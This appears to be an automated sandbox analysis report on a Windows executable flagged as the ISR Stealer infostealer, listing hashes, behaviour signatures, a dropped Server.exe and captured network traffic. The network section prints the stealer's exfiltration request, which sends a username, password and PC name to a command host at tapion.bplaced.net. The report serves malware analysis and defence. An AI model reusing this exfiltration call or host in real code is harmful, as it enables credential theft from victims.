Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08-10-2024 22:00

General

  • Target

    26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe

  • Size

    946KB

  • MD5

    26148b8e4595061e7716246a926c2eed

  • SHA1

    1a61f0eea11b5cade43f03aea8eda112ee23480c

  • SHA256

    31f9e2b98f96265b9f0b50baa0745dd88077b0a1c3adeb4047d66a6fe801e1a3

  • SHA512

    98eaf519c6d069f9bbeb6c4b71a87dca4a8fbf6ed77bda73280f2187c64d148af633a5c4ed0ce11e7ffba4c04e8c1796e42c0b9ba1232733b8f32869f1f5f7a7

  • SSDEEP

    12288:6aWzgMg7v3qnCiMErQohh0F4CCJ8lny/QLway9wv+U4iG+D:1aHMv6Corjqny/QLE91FiP

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in visual basic.

  • ISR Stealer payload 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\26148b8e4595061e7716246a926c2eed_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:2380

Network

  • flag-us
    DNS
    tapion.bplaced.net
    Server.exe
    Remote address:
    8.8.8.8:53
    Request
    tapion.bplaced.net
    IN A
    Response
    tapion.bplaced.net
    IN A
    162.55.0.137
  • flag-de
    GET
    http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft
    Server.exe
    Remote address:
    162.55.0.137:80
    Request
    GET /gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft HTTP/1.1
    User-Agent: HardCore Software For : Public
    Host: tapion.bplaced.net
    Response
    HTTP/1.1 403 Forbidden
    Date: Wed, 09 Oct 2024 04:16:56 GMT
    Server: Apache
    X-BP-NSA-REQID: (null) a.14UID=98
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Upgrade: h2,h2c
    Connection: Upgrade
    Last-Modified: Sat, 08 Oct 2022 17:29:29 GMT
    ETag: "1bbf-5ea8944ceff23"
    Accept-Ranges: bytes
    Content-Length: 7103
    Vary: Accept-Encoding
    Content-Type: text/html
  • 162.55.0.137:80
    http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft
    http
    Server.exe
    580 B
    7.8kB
    8
    8

    HTTP Request

    GET http://tapion.bplaced.net/gh/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=CCJBVTGQ&sitename=Microsoft

    HTTP Response

    403
  • 8.8.8.8:53
    tapion.bplaced.net
    dns
    Server.exe
    64 B
    80 B
    1
    1

    DNS Request

    tapion.bplaced.net

    DNS Response

    162.55.0.137

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Roaming\Server.exe

    Filesize

    76KB

    MD5

    afceef7f15a12be583888fd4cf6c78c4

    SHA1

    5574539642da242642b84ab6216edaa3f0bc159e

    SHA256

    33d03627bd449f6dc01bffbb5cc3fb8ebe95dc0f9eb036758440d7e5affbaa4f

    SHA512

    49ea1eeb55f07cc49f55b4337d4dbd537195d689c8c4336aa09e1723273431356f4e493d40f00b61735982924010fdcadbf4d2cd41c74351d1ff4e36e33e27e6

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.